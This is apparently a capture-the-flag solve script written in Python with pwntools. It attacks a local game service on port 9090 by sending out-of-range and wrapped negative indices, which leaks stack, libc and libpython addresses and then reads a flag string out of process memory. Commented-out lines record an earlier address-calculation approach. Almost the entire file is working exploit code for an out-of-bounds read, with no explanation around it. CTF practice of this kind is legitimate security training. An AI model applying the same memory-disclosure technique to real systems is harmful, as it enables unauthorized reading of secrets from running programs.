solve.py (1690B)
1from pwn import * 2import psutil 3import time 4 5io = remote("localhost", 9090) 6if args.DEBUG: 7 time.sleep(1) 8 filter = lambda p : "game.py" in p.cmdline() 9 pid = [p.pid for p in psutil.process_iter() if filter(p)][0] 10 util.misc.run_in_new_terminal(f"sudo -E gdb --pid={pid}") 11 input() 12 13def leak(offset, unpack=True): 14 io.readuntil(b"Easy or Hard? ") 15 io.sendline(b"hard") 16 17 io.readuntil("Ready? ") 18 io.sendline(b"") 19 20 leak = [] 21 for i in range(8): 22 io.readuntil(b"Index 1: ") 23 io.sendline(str(0).encode()) 24 25 io.readuntil(b"Index 2: ") 26 if offset < 0: 27 io.sendline(str((1 << 64) + offset + i).encode()) 28 else: 29 io.sendline(str(offset + i).encode()) 30 31 line = io.readline() 32 leak.append(int(line.split(b" ")[1])) 33 34 if unpack: 35 return struct.unpack("<Q", bytes(leak))[0] 36 else: 37 return bytes(leak) 38 39# stack_leak = leak(-0x28) 40# numbers = stack_leak - 0x100 41# print("numbers", hex(numbers)) 42# 43# libc_leak = leak(-0x18) 44# libc_clock_gettime = 0x00000000000cd6a0 45# libc_base = libc_leak - 29 - libc_clock_gettime 46# print("libc", hex(libc_base)) 47# 48# libpython_base = libc_base + 0x1e7000 49# print("libpython", hex(libpython_base)) 50# 51# pythonvars_leak = libpython_base + 0x390858 52# vars_base = leak(pythonvars_leak - numbers) 53# print("pythonvars", hex(vars_base)) 54# 55# flag_var = vars_base + 0x7fd00 56# print("flag", hex(flag_var)) 57 58#for i in range(10): 59# print(leak(flag_var + i * 8 - numbers, False)) 60 61numbers = leak(-0x30) 62print(numbers) 63flagobj = leak(-0xb48) 64print(flagobj) 65flagstr = flagobj + 0x30 66 67for i in range(4): 68 print(leak(flagstr + i * 8 - numbers, False))